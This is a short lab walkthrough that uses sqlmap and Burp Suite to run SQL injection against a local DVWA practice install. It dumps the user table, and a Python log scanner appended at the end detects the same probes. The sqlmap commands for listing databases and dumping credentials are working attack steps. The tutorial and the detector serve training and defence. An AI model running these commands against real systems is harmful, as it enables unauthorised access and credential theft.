DVWA is a web application developed for pentest practice (OWASP Top 10). This section explains how to obtain user accounts and passwords with SQLi and then create a backdoor on the server:
Let's play:
Running DVWA
==> Start the HTTPD and MySQL services.
==> Open the Mantra browser and set FoxyProxy to 127.0.0.1:8080.
==> Open the URL 127.0.0.1 in the Mantra browser.
==> To read the request data, Burp Suite will capture it if intercept is on.
==> Use sqlmap to run the SQLi.
Default username and password to log in to DVWA:
Username : admin
Password : password
## Will work if the DVWA security level is low or medium (which I have to try).
==> Open Burp Suite and turn intercept on before pushing the Submit button.
==> Try entering ' to check for a PHP/SQL syntax error.
==> Read the information captured in Burp Suite.
==> Run sqlmap to execute the SQLi with the command:
--> #./sqlmap.py -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=27&Submit=Submit#" --cookie "security=low; PHPSESSID=10nvojklih9vonbt5tf4thfma3" --dbs
==> Available databases [3]:
[*] dvwa
[*] information_schema
[*] mysql
==> To see the columns of the dvwa database, add to the command above: -D dvwa --tables --dbs
==> To get the users and passwords, add to the command above: -T user --dump
=== DONE ===
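As an added, defender-side example (not part of this post, DVWA or sqlmap), a small Python script that scans Apache access-log lines for the traffic this walkthrough generates against the sqli page: a non-numeric id parameter (the ' probe) and the sqlmap User-Agent. The log lines, timestamps, byte counts and sqlmap version string are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit
# Constructed Apache "combined" log lines (not from the page): a normal lookup, the manual quote probe, two sqlmap requests, a second normal lookup.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=27&Submit=Submit HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=27'&Submit=Submit HTTP/1.1" 200 1190 "-" "Mozilla/5.0"
127.0.0.1 - - [01/Jan/2024:10:00:31 +0000] "GET /dvwa/vulnerabilities/sqli/?id=27%27&Submit=Submit HTTP/1.1" 200 1190 "-" "sqlmap/1.7 (https://sqlmap.org)"
127.0.0.1 - - [01/Jan/2024:10:00:32 +0000] "GET /dvwa/vulnerabilities/sqli/?id=27%27%29&Submit=Submit HTTP/1.1" 200 1190 "-" "sqlmap/1.7 (https://sqlmap.org)"
127.0.0.1 - - [01/Jan/2024:10:01:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=28&Submit=Submit HTTP/1.1" 200 4519 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
SQLI_PATH = "/dvwa/vulnerabilities/sqli/"
NUMERIC_ID = re.compile(r"^\d+$")  # DVWA's id is a user number; anything else is a probe

def probe_reasons(target, user_agent):
    """Reasons a request to the DVWA sqli page looks like injection testing ([] if clean)."""
    parts = urlsplit(target)
    if parts.path != SQLI_PATH:
        return []
    reasons = []
    # parse_qs URL-decodes, so id=27%27 is seen as 27' exactly as PHP would see it
    for value in parse_qs(parts.query).get("id", []):
        if not NUMERIC_ID.match(value):
            reasons.append("non-numeric id parameter: " + repr(value))
    if "sqlmap" in user_agent.lower():
        reasons.append("sqlmap user agent")
    return reasons

def scan(log_text):
    """Return one (ip, decoded target, reasons) tuple per flagged request, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        reasons = probe_reasons(m["target"], m["ua"])
        if reasons:
            hits.append((m["ip"], unquote(m["target"]), reasons))
    return hits

def hits_per_ip(log_text):
    """Count flagged requests per source address (sqlmap sends bursts from one host)."""
    return Counter(ip for ip, _, _ in scan(log_text))
```

Running scan(SAMPLE_LOG) flags the quote probe and both sqlmap requests and leaves the two numeric lookups alone; on a real server the same check can be applied to the live access log or moved into the application as input validation on id.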
"Keep to learn and try harder"